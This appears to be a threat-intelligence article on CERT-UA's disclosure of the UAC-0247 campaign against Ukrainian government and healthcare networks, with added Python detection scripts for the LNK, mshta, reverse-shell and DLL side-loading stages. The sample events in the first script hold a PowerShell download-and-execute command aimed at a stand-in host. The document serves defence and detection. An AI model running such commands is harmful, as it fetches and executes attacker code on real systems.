UAC-0247 Campaign Targets Ukrainian Government and Healthcare with Advanced Malware Toolkit

CyberSecureFox

Ukraine’s national Computer Emergency Response Team, CERT-UA, has disclosed details of a new targeted cyber-espionage campaign tracked as UAC‑0247. The operation is primarily aimed at government entities and municipal healthcare organizations, including clinics and emergency medical services, with a clear objective: to achieve stealthy persistence, conduct internal reconnaissance, and steal sensitive data from infected systems.

UAC‑0247: Focus on State and Healthcare Infrastructure

According to CERT-UA, malicious activity attributed to UAC‑0247 has been observed from March to April 2026. While the exact origin of the threat actor remains unclear, the choice of victims and the tactics used indicate a strategic focus on public-sector networks and critical healthcare infrastructure.

In several incidents, traces of attempted compromise against members of Ukraine’s Defense Forces were also identified. In these cases, the attackers employed a separate malware delivery channel: malicious ZIP archives distributed via the Signal messenger, tailored specifically to this target group.

Humanitarian-Themed Phishing as Initial Access Vector

The campaign relies heavily on phishing emails that impersonate offers of humanitarian aid. Victims are prompted to follow a link to “clarify delivery details” or “register for assistance,” a theme that leverages the ongoing humanitarian context to increase click-through rates.

Clicking the link redirects users either to a legitimate but compromised website exploited via Cross-Site Scripting (XSS), or to a malicious landing page generated with the help of artificial intelligence tools. In both scenarios, the page encourages the victim to download and run a Windows shortcut file (.LNK), which serves as the entry point for the infection chain.

Infection Chain: From LNK and HTA to Code Injection via mshta.exe

The downloaded LNK file launches a remote HTML application (HTA file) using the built-in Windows utility mshta.exe. This “living-off-the-land” approach allows attackers to abuse a legitimate system binary, reducing the likelihood of early detection by traditional antivirus tools.

While the HTA application may display a decoy document or form to distract the user, it simultaneously retrieves a binary loader that injects malicious shellcode into a legitimate process such as runtimeBroker.exe. Running inside a trusted process improves stealth and complicates forensic analysis.

CERT-UA notes the use of a two-stage loader architecture. The first stage loads a proprietary executable format with custom code and data sections, its own import resolution, and relocation mechanisms. The final payload is additionally compressed and encrypted, significantly hindering static analysis and signature-based detection.
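The chain above (LNK double-click, explorer.exe launching mshta.exe with a remote HTA, mshta.exe pulling a second stage) leaves a recognisable trail in process-creation telemetry. The following added example is not from the advisory or from CyberSecureFox; it is a small Python rule set over Sysmon Event ID 1 style records (Image, ParentImage, CommandLine). The event records, the URL `aid-registration.example`, and the choice of rules are constructed assumptions for illustration.

```python
"""Flag process-creation events matching the LNK -> mshta.exe -> remote HTA chain.

The record layout mimics Sysmon Event ID 1 fields; the sample events at the
bottom are constructed test data, not telemetry from a real incident.
"""
from __future__ import annotations

import re

# Script hosts the advisory asks defenders to restrict.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
# Children that mshta.exe has no normal reason to spawn on a workstation (assumed baseline).
LOADER_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
HTA_RE = re.compile(r"\.hta\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_event(ev: dict) -> list[str]:
    """Return human-readable findings for one process-creation record (empty if benign)."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    url = URL_RE.search(cmd)
    findings: list[str] = []
    # mshta.exe fetching its HTA from a URL: the page's "remote HTML application" step.
    if image == "mshta.exe" and url:
        findings.append(f"mshta.exe executing remote content from {url.group(0)}")
    # A script host started by explorer.exe with a URL/HTA argument is what a
    # double-clicked LNK looks like from the process tree.
    if image in SCRIPT_HOSTS and parent == "explorer.exe" and (url or HTA_RE.search(cmd)):
        findings.append(f"{image} launched from explorer.exe with a URL/HTA argument (LNK double-click pattern)")
    # The HTA retrieving the loader usually shows up as mshta.exe spawning a second tool.
    if parent == "mshta.exe" and image in LOADER_CHILDREN:
        findings.append(f"mshta.exe spawned {image} (second-stage retrieval)")
    if image in SCRIPT_HOSTS and DOWNLOAD_RE.search(cmd):
        findings.append(f"{image} command line contains a download primitive")
    return findings


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and findings for every event that triggered at least one rule."""
    return [(i, f) for i, ev in enumerate(events) if (f := analyze_event(ev))]


# Constructed sample events (hostnames and paths are placeholders).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://aid-registration.example/form.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -c \"IEX((New-Object Net.WebClient).DownloadString('https://aid-registration.example/s'))\""},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" "C:\Users\u\Documents\report.docx"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}:")
        for h in hits:
            print("  -", h)
```

The last sample event, an administrator running a local script, produces no finding: the rules key on the combination of script host, parent and remote argument rather than on powershell.exe alone, which is what keeps a restriction like the one CERT-UA recommends workable where scripting is still justified.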

RAVENSHELL, AGINGFLY, SILENTLOOP: Custom Malware Arsenal

One of the core tools discovered in compromised environments is a TCP reverse shell dubbed RAVENSHELL. This component establishes an outbound TCP connection to the command-and-control (C2) server and enables remote command execution through the standard Windows shell cmd.exe, giving operators direct control over the infected host.

The attackers also deploy a family of malware known as AGINGFLY, together with a PowerShell script named SILENTLOOP. SILENTLOOP provides functions for command execution, automatic configuration updates, and dynamic retrieval of the C2 IP address from a Telegram channel. If the primary channel is unavailable, alternative mechanisms are used to resolve C2 infrastructure, enhancing resilience.

Written in C#, AGINGFLY functions as a full-featured remote access trojan (RAT). It communicates with its C2 servers via WebSockets, blending more easily with legitimate web traffic. Its capabilities include launching arbitrary processes, logging keystrokes, exfiltrating files, and deploying additional modules.

Analysis of multiple incidents shows that, once established, UAC‑0247 operators perform network discovery, lateral movement, and credential harvesting. Credentials and data are stolen from Chromium-based browsers and the WhatsApp desktop client, among other sources, often using adapted open-source tools and scripts to fit each victim’s environment. This behavior aligns with broader industry observations; for example, the Verizon Data Breach Investigations Report has repeatedly highlighted credential theft and lateral movement as key phases in modern intrusions.
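The three components described in this section share network behaviour a defender can look for: RAVENSHELL hands the operator cmd.exe from a process that holds an outbound connection, and SILENTLOOP fetches its C2 address from a Telegram channel. The added example below is not the advisory's or CyberSecureFox's code; it correlates Sysmon Event ID 3 style network records with Event ID 1 style process records in Python. The process baselines, the Telegram hostnames, and the sample records are assumptions constructed for the illustration.

```python
"""Correlate network-connection and process-creation records to surface
reverse-shell and messenger-based C2 lookups.

Field names follow Sysmon Event ID 3 / Event ID 1; all records below are
constructed sample data with documentation IP ranges.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Address space we treat as internal (assumed; extend with your own ranges).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
# Parents from which an interactive cmd.exe is expected (assumed baseline).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "conhost.exe", "services.exe", "code.exe"}
# Processes that, in this assumed baseline, never need an internet connection.
NO_NETWORK_EXPECTED = {"runtimebroker.exe", "cmd.exe", "notepad.exe"}
# The advisory says the C2 IP is fetched from a Telegram channel; these hostnames are assumptions.
MESSENGER_HOSTS = {"api.telegram.org", "t.me"}
# Clients that may legitimately talk to those hosts.
MESSENGER_OK = {"chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}


def is_external(ip: str) -> bool:
    """True when the address is outside the internal ranges above."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def detect(process_events: list[dict], network_events: list[dict]) -> list[str]:
    findings: list[str] = []
    # ProcessGuid -> external destinations, so process records can be joined to connections.
    external_by_guid: dict[str, list[str]] = defaultdict(list)
    for n in network_events:
        image = basename(n["Image"])
        dst = n["DestinationIp"]
        host = n.get("DestinationHostname", "").lower()
        if is_external(dst):
            external_by_guid[n["ProcessGuid"]].append(dst)
            if image in NO_NETWORK_EXPECTED:
                findings.append(f"{image} opened an outbound connection to {dst}:{n['DestinationPort']}")
        if host in MESSENGER_HOSTS and image not in MESSENGER_OK:
            findings.append(f"{image} contacted {host} (possible C2 address lookup via messenger channel)")
    for p in process_events:
        image = basename(p["Image"])
        parent = basename(p.get("ParentImage", ""))
        parent_guid = p.get("ParentProcessGuid")
        # cmd.exe whose parent is not an interactive shell host but does hold an
        # external connection: the shape of a TCP reverse shell.
        if image == "cmd.exe" and parent not in INTERACTIVE_PARENTS and parent_guid in external_by_guid:
            findings.append(f"cmd.exe spawned by {parent}, which holds an outbound connection to "
                            f"{external_by_guid[parent_guid][0]} (reverse-shell pattern)")
    return findings


# Constructed sample records.
SAMPLE_NETWORK_EVENTS = [
    {"ProcessGuid": "G-RB", "Image": r"C:\Windows\System32\RuntimeBroker.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"ProcessGuid": "G-PS", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443, "DestinationHostname": "api.telegram.org"},
    {"ProcessGuid": "G-CH", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "198.51.100.20", "DestinationPort": 443, "DestinationHostname": "www.example.com"},
    {"ProcessGuid": "G-DB", "Image": r"C:\Program Files\App\service.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 1433},
]
SAMPLE_PROCESS_EVENTS = [
    {"ProcessGuid": "G-C1", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\RuntimeBroker.exe", "ParentProcessGuid": "G-RB"},
    {"ProcessGuid": "G-C2", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentProcessGuid": "G-EXP"},
]

if __name__ == "__main__":
    for line in detect(SAMPLE_PROCESS_EVENTS, SAMPLE_NETWORK_EVENTS):
        print("-", line)
```

The join on ProcessGuid matters: the connection belongs to the injected host process, not to cmd.exe, so a rule that only looks at cmd.exe's own sockets would miss the reverse shell. The internal-range check is written out explicitly rather than using `ip_address().is_global`, because the standard library treats the documentation ranges used in the sample as non-global.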

Alternative Delivery via Signal and DLL Side-Loading

For attacks against Defense Forces personnel, CERT-UA reports a different initial vector: malicious ZIP archives delivered over Signal. These archives contain files crafted to exploit DLL side-loading, a technique where a legitimate application inadvertently loads a malicious DLL with a trusted name and location.

In this scenario, the trusted application launches and loads the attacker-controlled DLL, which in turn deploys AGINGFLY within the context of a legitimate process. This makes detection more difficult and allows the malware to operate under the guise of trusted software.
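Side-loading of this kind is visible at image-load time: a DLL carrying the name of a Windows system library is loaded from the same user-writable folder as the application that loads it, rather than from a system directory. The following added example is not from the advisory or from CyberSecureFox; it triages Sysmon Event ID 7 style image-load records in Python. The set of system DLL names, the user-writable path patterns and the sample records are constructed assumptions, and the `Signed` field presumes Sysmon is configured to record signature status.

```python
"""Triage image-load records for DLL side-loading indicators.

Record fields follow Sysmon Event ID 7 (Image, ImageLoaded, Signed); the
sample records are constructed, not from a real host.
"""
from __future__ import annotations

import re

# Directories from which Windows system DLLs are expected to load.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
# Locations an ordinary user can write to (assumed list; extend per environment).
USER_WRITABLE_RE = re.compile(r"^c:\\(users\\[^\\]+\\|programdata\\|windows\\temp\\)", re.IGNORECASE)
# Small illustrative set of Windows DLL names that ship in System32.
KNOWN_SYSTEM_DLLS = {
    "version.dll", "dwmapi.dll", "userenv.dll", "wtsapi32.dll",
    "cryptbase.dll", "profapi.dll", "dbghelp.dll", "uxtheme.dll",
}


def split_path(path: str) -> tuple[str, str]:
    """Lower-cased (directory, file name) of a Windows path."""
    directory, _, name = path.lower().rpartition("\\")
    return directory, name


def classify_image_load(ev: dict) -> tuple[str, str] | None:
    """Return (severity, reason) for a suspicious load, or None when nothing stands out."""
    loader_dir, loader_name = split_path(ev["Image"])
    dll_dir, dll_name = split_path(ev["ImageLoaded"])
    # Sysmon records Signed as the strings "true" / "false".
    signed = str(ev.get("Signed", "false")).lower() == "true"
    in_system_dir = (dll_dir + "\\").startswith(SYSTEM_DIRS)
    # A system DLL name resolved outside the system directories is the classic
    # side-loading shape: the loader found the attacker's copy first.
    if dll_name in KNOWN_SYSTEM_DLLS and not in_system_dir:
        return ("high", f"{dll_name} (system DLL name) loaded from {dll_dir} by {loader_name}")
    # Lower confidence: an unsigned DLL loaded from a user-writable folder that
    # also contains its loader, e.g. the contents of an extracted archive.
    if not signed and USER_WRITABLE_RE.match(dll_dir + "\\") and dll_dir == loader_dir:
        return ("medium", f"unsigned {dll_name} loaded from user-writable {dll_dir} beside {loader_name}")
    return None


def triage(events: list[dict]) -> list[tuple[int, tuple[str, str]]]:
    return [(i, r) for i, ev in enumerate(events) if (r := classify_image_load(ev))]


# Constructed sample records (paths are placeholders).
SAMPLE_LOADS = [
    {"Image": r"C:\Users\u\Downloads\aid_docs\viewer.exe",
     "ImageLoaded": r"C:\Users\u\Downloads\aid_docs\version.dll", "Signed": "false"},
    {"Image": r"C:\Program Files\App\app.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    {"Image": r"C:\Program Files\App\app.exe",
     "ImageLoaded": r"C:\Program Files\App\libcurl.dll", "Signed": "true"},
    {"Image": r"C:\Users\u\AppData\Local\Temp\x\tool.exe",
     "ImageLoaded": r"C:\Users\u\AppData\Local\Temp\x\helper.dll", "Signed": "false"},
]

if __name__ == "__main__":
    for idx, (severity, reason) in triage(SAMPLE_LOADS):
        print(f"[{severity}] record {idx}: {reason}")
```

Signature status is the weaker signal here: a side-loaded DLL may be unsigned, but the trusted application that loads it is signed, which is exactly why the page describes the malware as operating "under the guise of trusted software". The location check on the DLL name is what catches the first sample record.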

Defensive Measures and Risk Mitigation for Organizations

CERT-UA recommends reducing the attack surface by restricting or blocking execution of high-risk file types and scripting engines, including LNK, HTA, JS, and system utilities such as mshta.exe, powershell.exe, and wscript.exe, except where their use is clearly justified and controlled.

Organizations are further advised to implement application allowlisting, deploy modern Endpoint Detection and Response (EDR) solutions to identify anomalous process behavior and network connections, and apply strong network segmentation to limit lateral movement. Regular user awareness training remains critical, particularly on recognizing phishing emails themed around humanitarian or partnership initiatives, which are repeatedly exploited in real-world campaigns.

Global incident statistics consistently show that healthcare and public-sector entities are among the most targeted verticals, due to the high value of medical and citizen data and the operational impact of service disruption. Against this backdrop, the UAC‑0247 campaign underscores how a combination of phishing, abuse of legitimate Windows tools, and sophisticated loaders enables attackers to bypass traditional defenses and access critical information.

Organizations in government, healthcare, and defense should urgently review their security policies, harden the handling of attachments and scripts, and enhance monitoring for suspicious activity involving built-in Windows utilities and messaging platforms. Close attention to advisories from CERT-UA and other trusted incident response centers will improve early detection. The faster such campaigns are identified and contained, the fewer opportunities attackers have to weaponize stolen data against national infrastructure and civilian populations.
